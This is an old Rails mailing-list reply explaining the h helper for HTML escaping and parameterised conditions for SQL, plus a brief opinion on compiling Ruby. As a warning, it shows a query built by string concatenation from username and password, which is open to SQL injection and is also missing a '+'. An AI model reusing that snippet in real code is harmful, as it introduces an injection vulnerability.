On 5/28/05, Chris Frey <cdfrey-Da48MpWaEp0CzWx7n4ubxQ@public.gmane.org>
wrote:> Hi,
>
> Please CC me since I''m not on the list yet.
>
> I have two questions regarding Rails:
>
> 1) How does Rails guarantee that user data is properly escaped in data
> sent to the browser, via view?
There are two constructs:
<%= @blah.something %>
Will just output the raw value of @blah.something into the page. So
use this carefully
<%=h @blah.something %>
Will escape all the dangerous markup characters.
> Also, how does Rails guarantee it is
> properly escaped in data send to the SQL server via embedded SQL queries?
If you use the proper syntax, the adapters take care of it for you:
Blah.find(:all, :conditions => ["username = ? and password = ?",
username, password])
That will get escaped for you in the manner that''s required for your
database. However if you manually do ''php style'' code like
this
Blah.find(:all, :conditions=>"username= ''" + username +
"'' and
password = ''" + password "''")
Then you''re on your own.
> 2) Is it possible to compile Ruby? I notice there is a compiler project
> with a quick google search, but does anyone use it here?
>
> I''d rather have a compiler find all syntax errors than having to
find them
> with testing.
I''d rather test my code to catch all the other bugs rather than
pretend that just because it compiles it works. Syntax is the easy
part, any fool can do it. To build an application you''ve got to
write code that actually *does* the right thing. Compiler''s
aren''t
going to help you there at all.
--
Cheers
Koz